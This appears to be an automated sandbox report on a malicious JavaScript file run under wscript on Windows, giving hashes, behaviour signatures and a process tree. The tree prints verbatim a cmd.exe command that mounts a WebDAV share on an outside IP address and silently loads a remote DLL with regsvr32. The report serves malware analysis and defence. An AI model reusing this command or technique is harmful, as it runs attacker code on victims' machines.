Analysis
- max time kernel: 119s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 23/07/2024, 02:14
Static task: static1

Behavioral task: behavioral1
- Sample: 459218370446121433.js
- Resource: win7-20240708-en
- 3 signatures
- 150 seconds

Behavioral task: behavioral2
- Sample: 459218370446121433.js
- Resource: win10v2004-20240709-en
- 5 signatures
- 150 seconds
General
- Target: 459218370446121433.js
- Size: 5KB
- MD5: d8c4529a4f1db13819e670d2a913c7bd
- SHA1: 300a1948006261f19afa6547cb89f2170f6d5296
- SHA256: 83a34d7d1ddce6af24d568f85bd113fbe88708b81f402d5821eaf100120e3e1d
- SHA512: ba7cc27c796347e8ca866386355594552a434b7a81c5e4d9c7aabbc52a97e7f7465ae69345189476cb280c1954cff13f894ab200a0504992d85fe626244e2d32
- SSDEEP: 96:u5BwDXfVyX94cVNs7aqlAq4JnAkzKaH4Jng:uHw7VyX94WNs7tlAq4nAkzKaH4ng

Score: 3/10
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Runs net.exe
- Suspicious use of WriteProcessMemory (6 IoCs)

description                        pid     Process        procid_target
PID 816 wrote to memory of 2328    816     wscript.exe    31
PID 816 wrote to memory of 2328    816     wscript.exe    31
PID 816 wrote to memory of 2328    816     wscript.exe    31
PID 2328 wrote to memory of 776    2328    cmd.exe        33
PID 2328 wrote to memory of 776    2328    cmd.exe        33
PID 2328 wrote to memory of 776    2328    cmd.exe        33
Processes
C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\459218370446121433.js
  - Suspicious use of WriteProcessMemory
  PID: 816
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\31400226922294.dll
    - Suspicious use of WriteProcessMemory
    PID: 2328
    C:\Windows\system32\net.exe
      net use \\45.9.74.36@8888\davwwwroot\
      PID: 776